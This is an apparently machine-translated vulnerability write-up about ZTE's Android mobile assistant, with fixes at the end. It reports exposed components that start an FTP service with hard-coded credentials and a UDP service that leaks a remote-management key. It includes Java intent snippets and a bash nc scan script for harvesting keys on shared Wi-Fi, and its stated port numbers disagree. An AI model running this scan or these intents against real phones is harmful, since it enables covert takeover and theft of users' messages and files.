ZTE mobile assistant Local Elevation of Privilege and authentication mechanism for WIFI Remote Management bypass (detailed Android analysis process and ideas)

Source: Internet
Author: User

ZTE mobile assistant Local Elevation of Privilege and authentication mechanism for WIFI Remote Management bypass (detailed Android analysis process and ideas)

There are two vulnerabilities:

(1) components exposed, resulting in Local Elevation of Privilege and remote access

(2) Remote Management authentication mechanism Bypass

ZTE mobile assistant is the official Android smartphone management software of ZTE.

There are two vulnerabilities:

First vulnerability: Elevation of Privilege due to local component exposure, as long as the user installs the ZTE mobile assistant, local malicious applications without any permissions can start the FTP service for remote access without the user's knowledge, and the FTP service has the default user name and password.

The two Android components exposed are com. joinme. ftp. FtpServerService and JoinMeServiceReceiver. Use the following code,

m_testbutton1=(Button)findViewById(R.id.BySvc);        m_testbutton1.setOnClickListener(new OnClickListener()        {@Overridepublic void onClick(View v) {// TODO Auto-generated method stubIntent i = new Intent();i.setAction("com.joinme.ftp.FtpServerService");startService(i);}        });


Or
 

m_testbutton2=(Button)findViewById(R.id.ByReceiver);        m_testbutton2.setOnClickListener(new OnClickListener()        {@Overridepublic void onClick(View v) {// TODO Auto-generated method stubIntent i = new Intent();i.setAction("android.intent.action.JoinMe_Ftp_Server_Service_Start");sendBroadcast(i);}        });



One to start the FTP service built in the mobile assistant.



Under normal circumstances, user intervention is required to enable the Service,
 



Enable the service without your knowledge (you only need to install the ZTE mobile assistant on your mobile phone)
 



The FTP service also has a built-in default user name and password, and listens on port 2121. For example, see

Code snippet in FtpServerService.

Load FTP service settings
 



Follow the Defaults class to obtain the default username, password is JoinMe, port is 2121
 





Second vulnerability: When the mobile assistant is running in the background, SecretKey is leaked, resulting in remote control of the mobile phone in the WIFI Environment



When analyzing the first vulnerability, we found the second vulnerability. Compared with this vulnerability, the previous vulnerability was nothing more than that.

The vulnerability is located in JoinMeUdpService. This service enables udp port 65532 listening. After receiving a specific command word, it can return sensitive information of the mobile phone, including the SecretKey



, DoListen method of JoinMeUdpService
 



After entering doComm, you can find that the specific command is "JoinMe Broadcast"
 

 

Proof of the first vulnerability:

Use the default user name and password to remotely access the FTP service. Files in directories such as browse and download/sdcard are not root.
 



Commands supported by the FTP service
 





Proof of the second vulnerability:
 



Note that the above SecretKey is the verification code used by ZTE mobile assistant to manage mobile phones on PC. When the mobile assistant is running in the background, you can use the verification code on the PC side to fully manage the mobile phone and obtain all the communication records, text messages, photos, and application information, and has all the permissions to add and delete mobile assistants !!
 


 





The most lethal scenario is in public WIFI. When the user's mobile assistant runs, you can use the following script to scan for the SecretKey and use the PC for remote control!

Scan. sh
 

#!/bin/bashnetwork="192.168.1"for address in $(seq 1 254)do    echo  ${network}.${address}    echo -n "JoinMe Broadcast" | nc  -w 2 -u  ${network}.${address}  65502done



Scan results
 



Remote control mobile phone on PC side
 


 

Solution:

For vulnerability 1, set com. joinme. ftp. FtpServerService and JoinMeServiceReceiver to exported: false, or set custom permissions and set the protection level to signature. The FTP service user name and password. Do not hard-code them in the code. You can set them to be read in the configuration file. Or the user can temporarily specify the mobile assistant on the PC side.

Vulnerability 2: Disable remote echo SecretKey

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.